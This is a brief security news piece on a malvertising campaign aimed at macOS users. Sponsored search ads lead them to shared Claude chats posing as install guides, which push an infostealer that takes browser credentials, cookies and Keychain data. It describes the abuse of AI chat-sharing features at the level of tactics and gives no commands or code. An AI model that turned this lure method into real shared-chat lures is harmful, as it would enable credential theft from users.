Malvertising is a cunning tactic where attackers exploit Google Ads and legitimate AI platforms to distribute malware. In this case, the target is macOS users seeking the Claude Mac download. The campaign leverages shared Claude chats, masquerading as official installation guides, to deliver malware silently. What makes this particularly insidious is the attackers' use of legitimate AI platform features, making it harder for users to discern the malicious intent.
The malware, once executed, collects sensitive data such as browser credentials, cookies, and macOS Keychain contents. It then exfiltrates this information to the attacker's server, indicating a targeted and sophisticated attack. The attackers seem to be selective in their targeting, profiling victims before delivering the payload. This profiling includes checking for Russian or CIS-region keyboard input sources and gathering victim details like IP address, hostname, OS version, and keyboard locale.
What's more concerning is the attackers' ability to abuse AI platform shared chats. In December, a similar campaign targeted ChatGPT and Grok users, showcasing the growing trend of leveraging AI platforms for malicious purposes. This highlights the need for users to be vigilant and cautious when interacting with sponsored search results or shared chats, especially when they involve terminal commands.
The legitimate Claude Code CLI is available through official channels, and users should avoid clicking on sponsored search results for downloads. Pasting terminal commands from chat interfaces should always be approached with caution, as it can lead to unintended consequences. As AI continues to evolve, so do the tactics of malicious actors, making it crucial for users and security professionals to stay informed and proactive in their defense against such threats.
